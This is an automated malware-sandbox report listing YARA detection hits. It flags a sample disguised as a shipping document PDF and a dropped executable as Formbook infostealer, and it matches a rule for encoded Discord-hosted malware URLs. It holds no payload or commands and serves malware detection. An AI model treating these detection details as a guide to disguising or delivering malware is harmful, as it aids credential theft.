Source: Yara match	File source: 00000011.00000001.321255326.0000000000400000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000D.00000000.337058358.0000000007387000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000B.00000002.368626024.0000000000400000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000012.00000002.402671981.0000000000400000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000016.00000002.405522216.0000000000D60000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000003.291200860.0000000003DAC000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 0000000E.00000002.344615854.0000000003DEC000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 0000000E.00000003.339915553.0000000003E70000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000011.00000002.371342896.0000000000430000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000B.00000002.370946797.00000000006C0000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000B.00000002.369875714.0000000000690000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 00000012.00000001.339931194.0000000000400000.00000040.00020000.sdmp, type: MEMORY

System Summary:

Malicious sample detected (through community Yara rule)

Source: 11.2.Original Shipment Doc Ref 2853801324189923,PDF.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 11.2.Original Shipment Doc Ref 2853801324189923,PDF.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 17.1.Nyedvqj.exe.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 17.1.Nyedvqj.exe.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 18.2.Nyedvqj.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 18.2.Nyedvqj.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 17.2.Nyedvqj.exe.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 17.2.Nyedvqj.exe.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 17.2.Nyedvqj.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 17.2.Nyedvqj.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 11.1.Original Shipment Doc Ref 2853801324189923,PDF.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 11.1.Original Shipment Doc Ref 2853801324189923,PDF.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 11.2.Original Shipment Doc Ref 2853801324189923,PDF.exe.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 11.2.Original Shipment Doc Ref 2853801324189923,PDF.exe.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 18.2.Nyedvqj.exe.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 18.2.Nyedvqj.exe.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 18.1.Nyedvqj.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 18.1.Nyedvqj.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 11.1.Original Shipment Doc Ref 2853801324189923,PDF.exe.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 11.1.Original Shipment Doc Ref 2853801324189923,PDF.exe.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 17.1.Nyedvqj.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 17.1.Nyedvqj.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 18.1.Nyedvqj.exe.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 18.1.Nyedvqj.exe.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 0000000B.00000001.291686637.0000000000400000.00000040.00020000.sdmp, type: MEMORY	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 0000000B.00000001.291686637.0000000000400000.00000040.00020000.sdmp, type: MEMORY	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000012.00000002.403434949.00000000009D0000.00000040.00020000.sdmp, type: MEMORY	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000012.00000002.403434949.00000000009D0000.00000040.00020000.sdmp, type: MEMORY	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000012.00000002.402942283.0000000000590000.00000040.00020000.sdmp, type: MEMORY	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000012.00000002.402942283.0000000000590000.00000040.00020000.sdmp, type: MEMORY	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 0000000C.00000003.321247558.0000000003D30000.00000004.00000001.sdmp, type: MEMORY	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 0000000C.00000003.321247558.0000000003D30000.00000004.00000001.sdmp, type: MEMORY	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 0000000D.00000000.337416597.0000000007387000.00000040.00020000.sdmp, type: MEMORY	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 0000000D.00000000.337416597.0000000007387000.00000040.00020000.sdmp, type: MEMORY	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000013.00000002.380908074.0000000002B20000.00000040.00020000.sdmp, type: MEMORY	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000013.00000002.380908074.0000000002B20000.00000040.00020000.sdmp, type: MEMORY	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000011.00000002.371020252.0000000000400000.00000040.00000001.sdmp, type: MEMORY	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000011.00000002.371020252.0000000000400000.00000040.00000001.sdmp, type: MEMORY	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000011.00000002.373751532.00000000008E0000.00000040.00020000.sdmp, type: MEMORY	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000011.00000002.373751532.00000000008E0000.00000040.00020000.sdmp, type: MEMORY	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000014.00000002.527535096.0000000000BD0000.00000040.00020000.sdmp, type: MEMORY	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000014.00000002.527535096.0000000000BD0000.00000040.00020000.sdmp, type: MEMORY	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000014.00000002.532932295.0000000003630000.00000004.00000001.sdmp, type: MEMORY	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000014.00000002.532932295.0000000003630000.00000004.00000001.sdmp, type: MEMORY	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000001.00000002.302136605.0000000003D00000.00000004.00000001.sdmp, type: MEMORY	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000001.00000002.302136605.0000000003D00000.00000004.00000001.sdmp, type: MEMORY	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 0000000D.00000000.352491116.0000000007387000.00000040.00020000.sdmp, type: MEMORY	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 0000000D.00000000.352491116.0000000007387000.00000040.00020000.sdmp, type: MEMORY	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000014.00000002.532637283.0000000003600000.00000040.00020000.sdmp, type: MEMORY	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000014.00000002.532637283.0000000003600000.00000040.00020000.sdmp, type: MEMORY	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000001.00000002.302308233.0000000003D70000.00000004.00000001.sdmp, type: MEMORY	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000001.00000002.302308233.0000000003D70000.00000004.00000001.sdmp, type: MEMORY	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 0000000C.00000002.325589114.0000000003CAC000.00000004.00000001.sdmp, type: MEMORY	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 0000000C.00000002.325589114.0000000003CAC000.00000004.00000001.sdmp, type: MEMORY	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000011.00000001.321255326.0000000000400000.00000040.00020000.sdmp, type: MEMORY	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000011.00000001.321255326.0000000000400000.00000040.00020000.sdmp, type: MEMORY	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 0000000D.00000000.337058358.0000000007387000.00000040.00020000.sdmp, type: MEMORY	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 0000000D.00000000.337058358.0000000007387000.00000040.00020000.sdmp, type: MEMORY	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 0000000B.00000002.368626024.0000000000400000.00000040.00000001.sdmp, type: MEMORY	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 0000000B.00000002.368626024.0000000000400000.00000040.00000001.sdmp, type: MEMORY	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000012.00000002.402671981.0000000000400000.00000040.00000001.sdmp, type: MEMORY	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000012.00000002.402671981.0000000000400000.00000040.00000001.sdmp, type: MEMORY	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000016.00000002.405522216.0000000000D60000.00000040.00020000.sdmp, type: MEMORY	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000016.00000002.405522216.0000000000D60000.00000040.00020000.sdmp, type: MEMORY	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000001.00000003.291200860.0000000003DAC000.00000004.00000001.sdmp, type: MEMORY	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000001.00000003.291200860.0000000003DAC000.00000004.00000001.sdmp, type: MEMORY	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 0000000E.00000002.344615854.0000000003DEC000.00000004.00000001.sdmp, type: MEMORY	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 0000000E.00000002.344615854.0000000003DEC000.00000004.00000001.sdmp, type: MEMORY	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 0000000E.00000003.339915553.0000000003E70000.00000004.00000001.sdmp, type: MEMORY	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 0000000E.00000003.339915553.0000000003E70000.00000004.00000001.sdmp, type: MEMORY	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000011.00000002.371342896.0000000000430000.00000040.00020000.sdmp, type: MEMORY	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000011.00000002.371342896.0000000000430000.00000040.00020000.sdmp, type: MEMORY	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 0000000B.00000002.370946797.00000000006C0000.00000040.00020000.sdmp, type: MEMORY	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 0000000B.00000002.370946797.00000000006C0000.00000040.00020000.sdmp, type: MEMORY	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 0000000B.00000002.369875714.0000000000690000.00000040.00020000.sdmp, type: MEMORY	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 0000000B.00000002.369875714.0000000000690000.00000040.00020000.sdmp, type: MEMORY	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000012.00000001.339931194.0000000000400000.00000040.00020000.sdmp, type: MEMORY	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000012.00000001.339931194.0000000000400000.00000040.00020000.sdmp, type: MEMORY	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group

Yara signature match

Source: Original Shipment Doc Ref 2853801324189923,PDF.exe, type: SAMPLE	Matched rule: SUSP_Encoded_Discord_Attachment_Oct21_1 date = 2021-10-12, author = Florian Roth, description = Detects suspicious encoded URL to a Discord attachment (often used for malware hosting on a legitimate FQDN), reference = Internal Research, score =
Source: 11.2.Original Shipment Doc Ref 2853801324189923,PDF.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 11.2.Original Shipment Doc Ref 2853801324189923,PDF.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 17.1.Nyedvqj.exe.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 17.1.Nyedvqj.exe.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 18.2.Nyedvqj.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 18.2.Nyedvqj.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 17.2.Nyedvqj.exe.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 17.2.Nyedvqj.exe.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 17.2.Nyedvqj.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 17.2.Nyedvqj.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 11.0.Original Shipment Doc Ref 2853801324189923,PDF.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: SUSP_Encoded_Discord_Attachment_Oct21_1 date = 2021-10-12, author = Florian Roth, description = Detects suspicious encoded URL to a Discord attachment (often used for malware hosting on a legitimate FQDN), reference = Internal Research, score =
Source: 1.0.Original Shipment Doc Ref 2853801324189923,PDF.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: SUSP_Encoded_Discord_Attachment_Oct21_1 date = 2021-10-12, author = Florian Roth, description = Detects suspicious encoded URL to a Discord attachment (often used for malware hosting on a legitimate FQDN), reference = Internal Research, score =
Source: 17.0.Nyedvqj.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: SUSP_Encoded_Discord_Attachment_Oct21_1 date = 2021-10-12, author = Florian Roth, description = Detects suspicious encoded URL to a Discord attachment (often used for malware hosting on a legitimate FQDN), reference = Internal Research, score =
Source: 12.0.Nyedvqj.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: SUSP_Encoded_Discord_Attachment_Oct21_1 date = 2021-10-12, author = Florian Roth, description = Detects suspicious encoded URL to a Discord attachment (often used for malware hosting on a legitimate FQDN), reference = Internal Research, score =
Source: 14.2.Nyedvqj.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: SUSP_Encoded_Discord_Attachment_Oct21_1 date = 2021-10-12, author = Florian Roth, description = Detects suspicious encoded URL to a Discord attachment (often used for malware hosting on a legitimate FQDN), reference = Internal Research, score =
Source: 11.1.Original Shipment Doc Ref 2853801324189923,PDF.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 11.1.Original Shipment Doc Ref 2853801324189923,PDF.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 11.2.Original Shipment Doc Ref 2853801324189923,PDF.exe.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 11.2.Original Shipment Doc Ref 2853801324189923,PDF.exe.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 1.2.Original Shipment Doc Ref 2853801324189923,PDF.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: SUSP_Encoded_Discord_Attachment_Oct21_1 date = 2021-10-12, author = Florian Roth, description = Detects suspicious encoded URL to a Discord attachment (often used for malware hosting on a legitimate FQDN), reference = Internal Research, score =
Source: 18.2.Nyedvqj.exe.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 18.2.Nyedvqj.exe.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 18.1.Nyedvqj.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 18.1.Nyedvqj.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 12.2.Nyedvqj.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: SUSP_Encoded_Discord_Attachment_Oct21_1 date = 2021-10-12, author = Florian Roth, description = Detects suspicious encoded URL to a Discord attachment (often used for malware hosting on a legitimate FQDN), reference = Internal Research, score =
Source: 11.1.Original Shipment Doc Ref 2853801324189923,PDF.exe.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 11.1.Original Shipment Doc Ref 2853801324189923,PDF.exe.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 17.1.Nyedvqj.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 17.1.Nyedvqj.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 18.0.Nyedvqj.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: SUSP_Encoded_Discord_Attachment_Oct21_1 date = 2021-10-12, author = Florian Roth, description = Detects suspicious encoded URL to a Discord attachment (often used for malware hosting on a legitimate FQDN), reference = Internal Research, score =
Source: 18.1.Nyedvqj.exe.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 18.1.Nyedvqj.exe.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 14.0.Nyedvqj.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: SUSP_Encoded_Discord_Attachment_Oct21_1 date = 2021-10-12, author = Florian Roth, description = Detects suspicious encoded URL to a Discord attachment (often used for malware hosting on a legitimate FQDN), reference = Internal Research, score =
Source: 0000000C.00000002.321929561.0000000000473000.00000008.00020000.sdmp, type: MEMORY	Matched rule: SUSP_Encoded_Discord_Attachment_Oct21_1 date = 2021-10-12, author = Florian Roth, description = Detects suspicious encoded URL to a Discord attachment (often used for malware hosting on a legitimate FQDN), reference = Internal Research, score =
Source: 0000000B.00000001.291686637.0000000000400000.00000040.00020000.sdmp, type: MEMORY	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 0000000B.00000001.291686637.0000000000400000.00000040.00020000.sdmp, type: MEMORY	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000001.00000003.270904610.0000000003C8C000.00000004.00000001.sdmp, type: MEMORY	Matched rule: SUSP_Encoded_Discord_Attachment_Oct21_1 date = 2021-10-12, author = Florian Roth, description = Detects suspicious encoded URL to a Discord attachment (often used for malware hosting on a legitimate FQDN), reference = Internal Research, score =
Source: 00000012.00000002.403434949.00000000009D0000.00000040.00020000.sdmp, type: MEMORY	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000012.00000002.403434949.00000000009D0000.00000040.00020000.sdmp, type: MEMORY	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000001.00000002.298456001.0000000000473000.00000008.00020000.sdmp, type: MEMORY	Matched rule: SUSP_Encoded_Discord_Attachment_Oct21_1 date = 2021-10-12, author = Florian Roth, description = Detects suspicious encoded URL to a Discord attachment (often used for malware hosting on a legitimate FQDN), reference = Internal Research, score =
Source: 0000000C.00000000.293835698.0000000000471000.00000008.00020000.sdmp, type: MEMORY	Matched rule: SUSP_Encoded_Discord_Attachment_Oct21_1 date = 2021-10-12, author = Florian Roth, description = Detects suspicious encoded URL to a Discord attachment (often used for malware hosting on a legitimate FQDN), reference = Internal Research, score =
Source: 0000000E.00000000.311802519.0000000000471000.00000008.00020000.sdmp, type: MEMORY	Matched rule: SUSP_Encoded_Discord_Attachment_Oct21_1 date = 2021-10-12, author = Florian Roth, description = Detects suspicious encoded URL to a Discord attachment (often used for malware hosting on a legitimate FQDN), reference = Internal Research, score =
Source: 00000012.00000002.402942283.0000000000590000.00000040.00020000.sdmp, type: MEMORY	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000012.00000002.402942283.0000000000590000.00000040.00020000.sdmp, type: MEMORY	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
